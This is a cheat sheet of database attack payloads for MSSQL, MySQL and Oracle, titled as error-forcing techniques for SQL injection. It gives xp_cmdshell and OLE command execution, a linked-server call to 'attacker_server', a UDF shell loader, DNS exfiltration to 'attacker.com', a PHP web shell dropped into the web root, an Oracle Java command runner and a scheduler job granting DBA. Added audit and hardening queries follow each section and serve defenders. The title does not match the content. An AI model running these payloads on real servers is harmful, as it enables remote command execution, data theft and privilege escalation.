# Techniques to Force Errors from Databases for SQL Injection

### MSSQL

1. **OLE Automation Procedures**

   ```sql
   DECLARE @Object INT;
   EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;
   EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';
   ```

   This uses OLE Automation procedures to execute system commands.
2. **XP\_CMD Shell with Privilege Escalation**

   ```sql
   EXEC sp_configure 'show advanced options', 1;
   RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1;
   RECONFIGURE;
   EXEC xp_cmdshell 'whoami';
   ```

   This enables `xp_cmdshell` if it is not already enabled, then uses it to execute a system command.
3. **Linked Servers**

   ```sql
   EXEC sp_addlinkedserver 'attacker_server';
   EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password';
   EXEC ('xp_cmdshell ''net user''') AT attacker_server;
   ```

   This technique uses linked servers to run commands on a different server.
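
From the defender's side, all three MSSQL techniques depend on server state that can be inspected. The following T-SQL is an added audit example, not part of the original page; it assumes a login allowed to read the server-level catalog views it queries, and the final block is one possible hardening baseline for servers that do not need these features.

```sql
-- Added audit example (not from the original page).

-- 1. Server options that techniques 1 and 2 rely on. running_value = 1 means
--    the feature is active right now; configured_value <> running_value means
--    a change is waiting for RECONFIGURE.
SELECT name,
       CAST(value AS int)        AS configured_value,
       CAST(value_in_use AS int) AS running_value
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options')
ORDER BY name;

-- 2. Linked servers (technique 3). EXEC ... AT <server> only works when
--    RPC Out is enabled for that linked server.
SELECT s.name, s.product, s.provider, s.data_source,
       s.is_rpc_out_enabled, s.is_data_access_enabled, s.modify_date
FROM sys.servers AS s
WHERE s.is_linked = 1;

-- 3. Login mappings stored for those linked servers.
SELECT s.name AS linked_server, ll.remote_name,
       ll.uses_self_credential, ll.modify_date
FROM sys.linked_logins AS ll
JOIN sys.servers AS s ON s.server_id = ll.server_id
WHERE s.is_linked = 1;

-- 4. Members of the fixed server roles that can run sp_configure / RECONFIGURE.
--    An application login should not appear here.
SELECT r.name AS server_role, m.name AS member, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
ORDER BY r.name, m.name;

-- 5. Baseline for servers that do not need these features: turn both off.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```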

### MySQL

1. **UDF (User Defined Functions) for Remote Command Execution**

   ```sql
   CREATE TABLE foo(line BLOB);
   INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so'));
   SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
   CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
   SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');
   ```

   This technique involves creating a UDF to execute system commands.
2. **DNS Exfiltration**

   ```sql
   SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));
   ```

   This exfiltrates data through DNS requests to an attacker-controlled domain.
3. **Binary Log Injections**

   ```sql
   SET GLOBAL general_log = 'ON';
   SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
   SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
   ```

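   This turns on the general query log and uses `SELECT ... INTO OUTFILE` to write a web shell into the web root. The statements shown involve the general query log, not the binary log.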
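
Each MySQL technique above needs a specific privilege or server setting, so a short audit shows whether a given server is exposed. This is an added example, not part of the original page; the account name `'app_user'@'%'` in the last block is a hypothetical placeholder for the application's own account.

```sql
-- Added audit example (not from the original page).

-- 1. Settings that govern file reads/writes and logging.
--    secure_file_priv: ''        = LOAD_FILE / INTO OUTFILE / INTO DUMPFILE may use any path
--                      NULL      = import and export operations are disabled
--                      directory = operations are confined to that directory
SELECT @@secure_file_priv AS secure_file_priv,
       @@plugin_dir       AS plugin_dir,
       @@general_log      AS general_log,
       @@general_log_file AS general_log_file,
       @@log_output       AS log_output;

-- 2. Accounts with the global FILE privilege (needed for LOAD_FILE,
--    INTO OUTFILE and INTO DUMPFILE) or SUPER (allows SET GLOBAL).
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE privilege_type IN ('FILE', 'SUPER')
ORDER BY grantee, privilege_type;

-- 3. Registered UDFs. Every shared object named in `dl` should be one the
--    administrators installed on purpose.
SELECT name, dl, type
FROM mysql.func;

-- 4. Accounts with INSERT or DELETE on the mysql schema: these are the
--    privileges CREATE FUNCTION ... SONAME and DROP FUNCTION require.
SELECT grantee, privilege_type
FROM information_schema.schema_privileges
WHERE table_schema = 'mysql'
  AND privilege_type IN ('INSERT', 'DELETE')
ORDER BY grantee;

-- 5. Hardening for an application account that never needs file access.
--    'app_user'@'%' is a hypothetical account name.
REVOKE FILE ON *.* FROM 'app_user'@'%';
SET GLOBAL general_log = 'OFF';
-- secure_file_priv is read-only at runtime; set it in the server option
-- file (for example to NULL or a dedicated directory) and restart.
```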

### Oracle

1. **Java Procedures for Command Execution**

   ```sql
   EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );
   EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' );
   EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );

   CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
   import java.io.*;
   public class cmd {
      public static String run(String cmd) {
         try {
            StringBuffer output = new StringBuffer();
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line = "";
            while ((line = reader.readLine()) != null) {
               output.append(line + "\n");
            }
            return output.toString();
         } catch (Exception e) {
            return e.toString();
         }
      }
   };
   /

   CREATE OR REPLACE FUNCTION run_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
   AS LANGUAGE JAVA
   NAME 'cmd.run(java.lang.String) return java.lang.String';
   /

   SELECT run_cmd('id') FROM dual;
   ```

   This uses Java stored procedures to execute system commands.
2. **UTL\_FILE Package for File Access**

   ```sql
   DECLARE
      l_file UTL_FILE.FILE_TYPE;
      l_text VARCHAR2(32767);
   BEGIN
      l_file := UTL_FILE.FOPEN('DIRECTORY_NAME', 'output.txt', 'W');
      UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE');
      UTL_FILE.FCLOSE(l_file);
   END;
   ```

   This technique uses the `UTL_FILE` package to write files to the server.
3. **DBMS\_SCHEDULER for Job Execution**

   ```sql
   BEGIN
      DBMS_SCHEDULER.create_job(
         job_name => 'job1',
         job_type => 'PLSQL_BLOCK',
         job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;',
         start_date => SYSTIMESTAMP,
         repeat_interval => NULL,
         end_date => NULL,
         enabled => TRUE
      );
   END;
   ```

   This uses `DBMS_SCHEDULER` to execute jobs that can change database permissions.
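
The Oracle techniques leave their prerequisites and their results in the data dictionary, which makes them straightforward to audit. The queries below are an added example, not part of the original page; they assume an account that can read the `DBA_*` views, and query 2 assumes Oracle 12c or later for the `ORACLE_MAINTAINED` column.

```sql
-- Added audit example (not from the original page).

-- 1. Java policy entries of the types granted in technique 1.
SELECT grantee, kind, type_name, name, action, enabled
FROM dba_java_policy
WHERE type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
ORDER BY grantee, type_name, name;

-- 2. Java sources and classes that were not shipped by Oracle.
SELECT owner, object_name, object_type, created, last_ddl_time
FROM dba_objects
WHERE object_type IN ('JAVA SOURCE', 'JAVA CLASS')
  AND oracle_maintained = 'N'
ORDER BY created DESC;

-- 3. Directory objects and who may read or write through them (UTL_FILE).
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
FROM dba_directories d
LEFT JOIN dba_tab_privs p
       ON p.owner = d.owner
      AND p.table_name = d.directory_name
      AND p.privilege IN ('READ', 'WRITE')
ORDER BY d.directory_name, p.grantee;

-- 4. EXECUTE grants on the packages used above; grants to PUBLIC reach every account.
SELECT grantee, table_name, privilege
FROM dba_tab_privs
WHERE table_name IN ('UTL_FILE', 'DBMS_SCHEDULER', 'DBMS_JAVA')
  AND privilege = 'EXECUTE'
ORDER BY table_name, grantee;

-- 5. Who can create scheduler jobs, and which PL/SQL block jobs exist.
--    A job runs with the privileges of its owner.
SELECT grantee, privilege
FROM dba_sys_privs
WHERE privilege IN ('CREATE JOB', 'CREATE ANY JOB', 'CREATE EXTERNAL JOB')
ORDER BY grantee;

SELECT owner, job_name, job_type, job_action, enabled, state
FROM dba_scheduler_jobs
WHERE job_type = 'PLSQL_BLOCK'
ORDER BY owner, job_name;

-- 6. Current holders of the DBA role, to compare against the expected list.
SELECT grantee, admin_option
FROM dba_role_privs
WHERE granted_role = 'DBA';
```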


